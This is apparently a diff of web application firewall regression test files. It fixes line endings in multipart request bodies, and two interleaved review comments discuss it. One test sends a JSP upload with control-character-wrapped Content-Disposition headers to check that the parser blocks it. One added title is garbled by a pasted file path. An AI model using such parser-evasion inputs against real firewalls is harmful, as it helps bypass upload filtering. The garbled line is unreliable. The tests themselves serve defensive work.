+ "\r\n",
+ "brian.rectanus@breach.com\r\n",
+ "--0000\r\n",
+ "Content-Type: multipart/mixed; boundary=BbC04y\r\n",
+ "\r\n",
+ "--BbC04y\r\n",
+ "Content-Disposition: file; filename=\"file1.txt\"\r\n",
+ "Content-Type: text/plain\r\n",
+ "\r\n",
+ "... contents of file1.txt ...\r\n",
+ "--BbC04y\r\n",
+ "Content-Disposition: file; filename=\"file2.gif\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "Content-Transfer-Encoding: binary\r\n",
+ "\r\n",
+ "...contents of file2.gif...\r\n",
+ "--0000--\r\n"
 ]
 },
 "response":{
@@ -2390,34 +2388,34 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image1\"; filename=\"image1.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA1\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image2\"; filename=\"image2.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA2\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image3\"; filename=\"image3.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA3\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"test\"\r",
- "\r",
- "This is test data.\r",
- "--0000--\r"
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"name\"\r\n",
+ "\r\n",
+ "Brian Rectanus\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"email\"\r\n",
+ "\r\n",
+ "brian.rectanus@breach.com\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"image1\"; filename=\"image1.jpg\"\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "\r\n",
+ "BINARYDATA1\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"image2\"; filename=\"image2.jpg\"\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "\r\n",
+ "BINARYDATA2\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"image3\"; filename=\"image3.jpg\"\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "\r\n",
+ "BINARYDATA3\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"test\"\r\n",
+ "\r\n",
+ "This is test data.\r\n",
+ "--0000--\r\n"
 ]
 },
 "response":{
@@ -2537,26 +2535,26 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-------------------------------8842564605616207552020332273\r",
- "Content-Disposition: form-data; name=\"_token\"\r",
- "\r",
- "9e433de44c9e9b4ce19603269aa34edb\r",
- "-------------------------------8842564605616207552020332273\r",
- "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r",
- "Content-Type: text/plain\r",
- "\r",
- "----ea520cef1a2937d8e928e357992c8fdd\r",
- "Content-Transfer-Encoding: 7bit\r",
- "Content-Type: text/plain; charset=US-ASCII;\r",
- " format=flowed\r",
- "\r",
- "Test message, the txt file had been attached.\r",
- "\r",
- "--\r",
- "Ervin\r",
- "\r",
- "\r",
- "-------------------------------8842564605616207552020332273--\r"
+ "-------------------------------8842564605616207552020332273\r\n",
+ "Content-Disposition: form-data; name=\"_token\"\r\n",
+ "\r\n",
+ "9e433de44c9e9b4ce19603269aa34edb\r\n",
+ "-------------------------------8842564605616207552020332273\r\n",
+ "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r\n",
+ "Content-Type: text/plain\r\n",
+ "\r\n",
+ "----ea520cef1a2937d8e928e357992c8fdd\r\n",
+ "Content-Transfer-Encoding: 7bit\r\n",
+ "Content-Type: text/plain; charset=US-ASCII;\r\n",
+ " format=flowed\r\n",
+ "\r\n",
+ "Test message, the txt file had been attached.\r\n",
+ "\r\n",
+ "--\r\n",
+ "Ervin\r\n",
+ "\r\n",
+ "\r\n",
+ "-------------------------------8842564605616207552020332273--\r\n"
 ]
 },
 "response":{
@@ -2581,7 +2579,7 @@
 {
 "enabled":1,
 "version_min":300000,
- "title":"multipart parser (contains foreign bound., wrong lead bound., strict mode)",
+ "title":"multipart parser (ctest-cases/regression/request-body-parser-multipart.jsonontains foreign bound., wrong lead bound., strict mode)",
 "client":{
 "ip":"200.249.12.31",
 "port":123
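Review bot: The new `title` in the hunk at -2581 has a file path pasted into the middle of the word "contains", so it now reads `(ctest-cases/regression/request-body-parser-multipart.jsonontains foreign bound., ...`. Nothing else in that hunk changes, so this looks like an accidental paste rather than an intended rename. The line should go back to `"title":"multipart parser (contains foreign bound., wrong lead bound., strict mode)",`. A garbled title presumably makes this strict-mode boundary case harder to find when it is reported or selected by name.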
@@ -2602,26 +2600,26 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------8842564605616207552020332274\r", - "Content-Disposition: form-data; name=\"_token\"\r", - "\r", - "9e433de44c9e9b4ce19603269aa34edb\r", - "-------------------------------8842564605616207552020332273\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "----ea520cef1a2937d8e928e357992c8fdd\r", - "Content-Transfer-Encoding: 7bit\r", - "Content-Type: text/plain; charset=US-ASCII;\r", - " format=flowed\r", - "\r", - "Test message, the txt file had been attached.\r", - "\r", - "--\r", - "Ervin\r", - "\r", - "\r", - "-------------------------------8842564605616207552020332273--\r" + "-------------------------------8842564605616207552020332274\r\n", + "Content-Disposition: form-data; name=\"_token\"\r\n", + "\r\n", + "9e433de44c9e9b4ce19603269aa34edb\r\n", + "-------------------------------8842564605616207552020332273\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "----ea520cef1a2937d8e928e357992c8fdd\r\n", + "Content-Transfer-Encoding: 7bit\r\n", + "Content-Type: text/plain; charset=US-ASCII;\r\n", + " format=flowed\r\n", + "\r\n", + "Test message, the txt file had been attached.\r\n", + "\r\n", + "--\r\n", + "Ervin\r\n", + "\r\n", + "\r\n", + "-------------------------------8842564605616207552020332273--\r\n" ] }, "response":{ 
@@ -2667,26 +2665,26 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------8842564605616207552020332273\r", - "Content-Disposition: form-data; name=\"_token\"\r", - "\r", - "9e433de44c9e9b4ce19603269aa34edb\r", - "-------------------------------8842564605616207552020332274\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "----ea520cef1a2937d8e928e357992c8fdd\r", - "Content-Transfer-Encoding: 7bit\r", - "Content-Type: text/plain; charset=US-ASCII;\r", - " format=flowed\r", - "\r", - "Test message, the txt file had been attached.\r", - "\r", - "--\r", - "Ervin\r", - "\r", - "\r", - "-------------------------------8842564605616207552020332273--\r" + "-------------------------------8842564605616207552020332273\r\n", + "Content-Disposition: form-data; name=\"_token\"\r\n", + "\r\n", + "9e433de44c9e9b4ce19603269aa34edb\r\n", + "-------------------------------8842564605616207552020332274\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "----ea520cef1a2937d8e928e357992c8fdd\r\n", + "Content-Transfer-Encoding: 7bit\r\n", + "Content-Type: text/plain; charset=US-ASCII;\r\n", + " format=flowed\r\n", + "\r\n", + "Test message, the txt file had been attached.\r\n", + "\r\n", + "--\r\n", + "Ervin\r\n", + "\r\n", + "\r\n", + "-------------------------------8842564605616207552020332273--\r\n" ] }, "response":{ 
@@ -2732,26 +2730,26 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------8842564605616207552020332273\r", - "Content-Disposition: form-data; name=\"_token\"\r", - "\r", - "9e433de44c9e9b4ce19603269aa34edb\r", - "-------------------------------8842564605616207552020332273\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "----ea520cef1a2937d8e928e357992c8fdd\r", - "Content-Transfer-Encoding: 7bit\r", - "Content-Type: text/plain; charset=US-ASCII;\r", - " format=flowed\r", - "\r", - "Test message, the txt file had been attached.\r", - "\r", - "--\r", - "Ervin\r", - "\r", - "\r", - "-------------------------------8842564605616207552020332274--\r" + "-------------------------------8842564605616207552020332273\r\n", + "Content-Disposition: form-data; name=\"_token\"\r\n", + "\r\n", + "9e433de44c9e9b4ce19603269aa34edb\r\n", + "-------------------------------8842564605616207552020332273\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "----ea520cef1a2937d8e928e357992c8fdd\r\n", + "Content-Transfer-Encoding: 7bit\r\n", + "Content-Type: text/plain; charset=US-ASCII;\r\n", + " format=flowed\r\n", + "\r\n", + "Test message, the txt file had been attached.\r\n", + "\r\n", + "--\r\n", + "Ervin\r\n", + "\r\n", + "\r\n", + "-------------------------------8842564605616207552020332274--\r\n" ] }, "response":{ 
@@ -2797,22 +2795,22 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------8842564605616207552020332274\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "----ea520cef1a2937d8e928e357992c8fdd\r", - "Content-Transfer-Encoding: 7bit\r", - "Content-Type: text/plain; charset=US-ASCII;\r", - " format=flowed\r", - "\r", - "Test message, the txt file had been attached.\r", - "\r", - "--\r", - "Ervin\r", - "\r", - "\r", - "-------------------------------8842564605616207552020332273--\r" + "-------------------------------8842564605616207552020332274\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "----ea520cef1a2937d8e928e357992c8fdd\r\n", + "Content-Transfer-Encoding: 7bit\r\n", + "Content-Type: text/plain; charset=US-ASCII;\r\n", + " format=flowed\r\n", + "\r\n", + "Test message, the txt file had been attached.\r\n", + "\r\n", + "--\r\n", + "Ervin\r\n", + "\r\n", + "\r\n", + "-------------------------------8842564605616207552020332273--\r\n" ] }, "response":{ 
@@ -2858,22 +2856,22 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------8842564605616207552020332273\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "----ea520cef1a2937d8e928e357992c8fdd\r", - "Content-Transfer-Encoding: 7bit\r", - "Content-Type: text/plain; charset=US-ASCII;\r", - " format=flowed\r", - "\r", - "Test message, the txt file had been attached.\r", - "\r", - "--\r", - "Ervin\r", - "\r", - "\r", - "-------------------------------8842564605616207552020332274--\r" + "-------------------------------8842564605616207552020332273\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "----ea520cef1a2937d8e928e357992c8fdd\r\n", + "Content-Transfer-Encoding: 7bit\r\n", + "Content-Type: text/plain; charset=US-ASCII;\r\n", + " format=flowed\r\n", + "\r\n", + "Test message, the txt file had been attached.\r\n", + "\r\n", + "--\r\n", + "Ervin\r\n", + "\r\n", + "\r\n", + "-------------------------------8842564605616207552020332274--\r\n" ] }, "response":{ 
@@ -2919,36 +2917,36 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------3163850615828140691827348175\r", - "Content-Disposition: form-data; name=\"_token\"\r", - "\r", - "3eeb646795ba8db63b05ba77df2a0b2c\r", - "-----------------------------3163850615828140691827348175\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"multipart_text.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "Content-Type: multipart/alternative; boundary=\"00000000000041382f056d9314e6\"\r", - "\r", - "--00000000000041382f056d9314e6\r", - "Content-Type: text/plain; charset=\"UTF-8\"\r", - "Content-Transfer-Encoding: quoted-printable\r", - "\r", - "Hi,\r", - "\r", - "...\r", - "\r", - "--00000000000041382f056d9314e6\r", - "Content-Type: text/html; charset=\"UTF-8\"\r", - "Content-Transfer-Encoding: quoted-printable\r", - "\r", - "
\r", - "...\r", - "
\r", - "\r", - "--00000000000041382f056d9314e6--\r", - "\r", - "\r", - "-----------------------------3163850615828140691827348175--\r" + "-----------------------------3163850615828140691827348175\r\n", + "Content-Disposition: form-data; name=\"_token\"\r\n", + "\r\n", + "3eeb646795ba8db63b05ba77df2a0b2c\r\n", + "-----------------------------3163850615828140691827348175\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"multipart_text.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "Content-Type: multipart/alternative; boundary=\"00000000000041382f056d9314e6\"\r\n", + "\r\n", + "--00000000000041382f056d9314e6\r\n", + "Content-Type: text/plain; charset=\"UTF-8\"\r\n", + "Content-Transfer-Encoding: quoted-printable\r\n", + "\r\n", + "Hi,\r\n", + "\r\n", + "...\r\n", + "\r\n", + "--00000000000041382f056d9314e6\r\n", + "Content-Type: text/html; charset=\"UTF-8\"\r\n", + "Content-Transfer-Encoding: quoted-printable\r\n", + "\r\n", + "
\r\n", + "...\r\n", + "
\r\n", + "\r\n", + "--00000000000041382f056d9314e6--\r\n", + "\r\n", + "\r\n", + "-----------------------------3163850615828140691827348175--\r\n" ] }, "response":{ @@ -3264,15 +3262,15 @@ "uri":"/", "method":"POST", "body":[ - "--00000000\r", - "Content-Disposition: form-data; name=\"namea\"\r", - "\r", - "111\r", - "--00000000\r", - "Content-Disposition: form-data; name=\"nameb\"\r", - "\r", - "222\r", - "--00000000--\r" + "--00000000\r\n", + "Content-Disposition: form-data; name=\"namea\"\r\n", + "\r\n", + "111\r\n", + "--00000000\r\n", + "Content-Disposition: form-data; name=\"nameb\"\r\n", + "\r\n", + "222\r\n", + "--00000000--\r\n" ] }, "response":{ @@ -3319,12 +3317,12 @@ "uri":"/", "method":"POST", "body":[ - "--a\r", - "\u000eContent-Disposition\u000e: form-data; name=\"file\"; filename=\"1.jsp\"\r", - "Content-Disposition: form-data; name=\"post\";\r", - "\r", - "<%out.print(123)%>\r", - "--a--\r" + "--a\r\n", + "\u000eContent-Disposition\u000e: form-data; name=\"file\"; filename=\"1.jsp\"\r\n", + "Content-Disposition: form-data; name=\"post\";\r\n", + "\r\n", + "<%out.print(123)%>\r\n", + "--a--\r\n" ] }, "response":{ @@ -3346,4 +3344,4 @@ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" ] } -] +] diff --git a/test/test-cases/regression/rule-920120.json b/test/test-cases/regression/rule-920120.json index cdc437074f..7a3ec93881 100644 --- a/test/test-cases/regression/rule-920120.json +++ b/test/test-cases/regression/rule-920120.json 
@@ -25,21 +25,21 @@ "uri":"/", "method":"POST", "body": [ - "-----------------------------265001916915724\r", - "Content-Disposition: form-data; name=\"fi;le\"; filename=\"test\"\r", - "Content-Type: application/octet-stream\r", - "\r", - "Rotem & Ayala\r", - "\r", - "-----------------------------265001916915724\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "tt2\r", - "-----------------------------265001916915724\r", - "Content-Disposition: form-data; name=\"B1\"\r", - "\r", - "Submit\r", - "-----------------------------265001916915724--\r" + "-----------------------------265001916915724\r\n", + "Content-Disposition: form-data; name=\"fi;le\"; filename=\"test\"\r\n", + "Content-Type: application/octet-stream\r\n", + "\r\n", + "Rotem & Ayala\r\n", + "\r\n", + "-----------------------------265001916915724\r\n", + "Content-Disposition: form-data; name=\"name\"\r\n", + "\r\n", + "tt2\r\n", + "-----------------------------265001916915724\r\n", + "Content-Disposition: form-data; name=\"B1\"\r\n", + "\r\n", + "Submit\r\n", + "-----------------------------265001916915724--\r\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json b/test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json index 034005acea..77f06c515d 100644 --- a/test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json +++ b/test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json @@ -114,7 +114,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"25." + "debug_log":"Target value: \"24." }, "rules":[ "SecRuleEngine On", @@ -158,7 +158,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"28." + "debug_log":"Target value: \"27." }, "rules":[ "SecRuleEngine On", @@ -202,7 +202,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"16." + "debug_log":"Target value: \"15." }, "rules":[ "SecRuleEngine On", 
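Review bot: In variable-ARGS_COMBINED_SIZE.json the three `debug_log` expectations drop by one (`25.` to `24.`, `28.` to `27.`, `16.` to `15.`), whereas the other files get their newline restored in the body lines. The request bodies are outside these hunks, so this is inferred, but it suggests the old values counted the implicit trailing newline as part of the last argument, and that no case now sends a body ending in a newline. For a variable that feeds size limits, it is worth keeping one case whose last body element ends in `\n` with the previous expectation, e.g. `"debug_log":"Target value: \"25."`, so both inputs stay pinned.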
diff --git a/test/test-cases/regression/variable-ARGS_NAMES.json b/test/test-cases/regression/variable-ARGS_NAMES.json index bf3e80d427..fe4445e702 100644 --- a/test/test-cases/regression/variable-ARGS_NAMES.json +++ b/test/test-cases/regression/variable-ARGS_NAMES.json @@ -189,15 +189,15 @@ "uri":"/", "method":"POST", "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name1\"\r", - "\r", - "content1\r", - "--0000\r", - "Content-Disposition: form-data; name=\"name2\"\r", - "\r", - "content2\r", - "--0000--\r" + "--0000\r\n", + "Content-Disposition: form-data; name=\"name1\"\r\n", + "\r\n", + "content1\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"name2\"\r\n", + "\r\n", + "content2\r\n", + "--0000--\r\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-ARGS_POST_NAMES.json b/test/test-cases/regression/variable-ARGS_POST_NAMES.json index e414c8763b..c25a93c038 100644 --- a/test/test-cases/regression/variable-ARGS_POST_NAMES.json +++ b/test/test-cases/regression/variable-ARGS_POST_NAMES.json @@ -111,15 +111,15 @@ "uri":"/", "method":"POST", "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name1\"\r", - "\r", - "content1\r", - "--0000\r", - "Content-Disposition: form-data; name=\"name2\"\r", - "\r", - "content2\r", - "--0000--\r" + "--0000\r\n", + "Content-Disposition: form-data; name=\"name1\"\r\n", + "\r\n", + "content1\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"name2\"\r\n", + "\r\n", + "content2\r\n", + "--0000--\r\n" ] }, "response":{ 
@@ -163,15 +163,15 @@ "uri":"/", "method":"POST", "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name1\"\r", - "\r", - "content1\r", - "--0000\r", - "Content-Disposition: form-data; name=\"name2\"\r", - "\r", - "content2\r", - "--0000--\r" + "--0000\r\n", + "Content-Disposition: form-data; name=\"name1\"\r\n", + "\r\n", + "content1\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"name2\"\r\n", + "\r\n", + "content2\r\n", + "--0000--\r\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-FILES.json b/test/test-cases/regression/variable-FILES.json index 7f0f4dcf56..493cb4d352 100644 --- a/test/test-cases/regression/variable-FILES.json +++ b/test/test-cases/regression/variable-FILES.json 
@@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ 
@@ -82,21 +82,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata1\"; filename=\"myfile.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata2\"; filename=\"nextfile.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata1\"; filename=\"myfile.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata2\"; filename=\"nextfile.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-FILES_COMBINED_SIZE.json b/test/test-cases/regression/variable-FILES_COMBINED_SIZE.json index 23a1c027ee..961d14e534 100644 --- a/test/test-cases/regression/variable-FILES_COMBINED_SIZE.json +++ b/test/test-cases/regression/variable-FILES_COMBINED_SIZE.json 
@@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-FILES_NAMES.json b/test/test-cases/regression/variable-FILES_NAMES.json index fcf95ed972..0e35fdc611 100644 --- a/test/test-cases/regression/variable-FILES_NAMES.json +++ b/test/test-cases/regression/variable-FILES_NAMES.json 
@@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-FILES_SIZES.json b/test/test-cases/regression/variable-FILES_SIZES.json index fa8a3525c7..9c1228a3cd 100644 --- a/test/test-cases/regression/variable-FILES_SIZES.json +++ b/test/test-cases/regression/variable-FILES_SIZES.json 
@@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json b/test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json index dd9d0292d3..d7c4b98db7 100644 --- a/test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json +++ b/test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json 
@@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "--------------------------756b6d74fa1a8ee2--" + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "--------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json b/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json index 2142729992..95e8bd4eb9 100644 --- a/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json +++ b/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json 
@@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ 
